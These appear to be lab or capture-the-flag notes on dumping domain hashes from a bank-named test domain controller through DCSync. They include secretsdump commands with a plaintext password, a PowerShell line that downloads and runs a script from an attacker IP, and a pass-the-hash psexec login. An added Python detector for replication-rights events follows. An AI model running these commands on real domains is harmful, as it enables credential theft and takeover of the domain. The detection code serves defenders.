Identification from BloodHound
The target IP is the Domain Controller.
impacket-secretsdump EGOSTISCAL-BANK.LOCAL/svc_loanmgr:'Moneymakestheworldgoround!'@$IP
Or dump a specific user with -just-dc-user <username>:
impacket-secretsdump EGOSTISCAL-BANK.LOCAL/svc_loanmgr:'Moneymakestheworldgoround!'@$IP -just-dc-user Administrator
https://github.com/pentestfactory/Invoke-DCSync
iex(new-object net.webclient).downloadstring('http://10.10.x.y/Invoke-DCSync.ps1'); Invoke-DCSync
Log in using psexec and pass the hash:
impacket-psexec egostical-bank.local/administrator@$IP -hashes 823452073d75b9d1cf70ebdf86c7f98e:823452073d75b9d1cf70ebdf86c7f98e
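Detection side of the replication dump above, as an added example that is not part of the original notes: it scans Security Event ID 4662 records for the directory replication control-access rights requested by a principal that is not an expected replication account. It assumes Directory Service Access auditing is enabled on the DC and that events have been exported as dictionaries; `find_dcsync`, the field layout and the `DC01$` account are hypothetical, and the events are constructed.

```python
# Added example (not from the original notes). Event records are constructed samples.
# Control-access rights that Event ID 4662 records when directory replication is requested.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # AccessMask bit for extended (control access) rights


def find_dcsync(events, replication_accounts):
    """Return one alert per 4662 event where an unexpected principal used replication rights."""
    allowed = {name.lower() for name in replication_accounts}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        if not int(ev.get("AccessMask", "0x0"), 16) & CONTROL_ACCESS:
            continue
        props = ev.get("Properties", "").lower()
        rights = sorted(n for guid, n in REPLICATION_RIGHTS.items() if guid in props)
        user = ev.get("SubjectUserName", "")
        if rights and user.lower() not in allowed:
            alerts.append({"time": ev.get("TimeCreated"), "user": user, "rights": rights})
    return alerts


# Constructed events; DC01$ is a hypothetical domain controller machine account.
SAMPLE_EVENTS = [
    {"EventID": 4662, "TimeCreated": "2024-01-01T10:00:00Z", "SubjectUserName": "DC01$",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "TimeCreated": "2024-01-01T10:05:00Z", "SubjectUserName": "svc_loanmgr",
     "AccessMask": "0x100",
     "Properties": "{1131F6AA-9C07-11D1-F79F-00C04FC2DCD2} {1131F6AD-9C07-11D1-F79F-00C04FC2DCD2}"},
    {"EventID": 4662, "TimeCreated": "2024-01-01T10:06:00Z", "SubjectUserName": "jdoe",
     "AccessMask": "0x10",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
    {"EventID": 4624, "TimeCreated": "2024-01-01T10:07:00Z", "SubjectUserName": "svc_loanmgr"},
]

if __name__ == "__main__":
    for alert in find_dcsync(SAMPLE_EVENTS, {"DC01$"}):
        print(alert)
```

The allowlist should hold every domain controller machine account plus any sanctioned directory synchronization account, so that a service account such as svc_loanmgr holding these rights stands out.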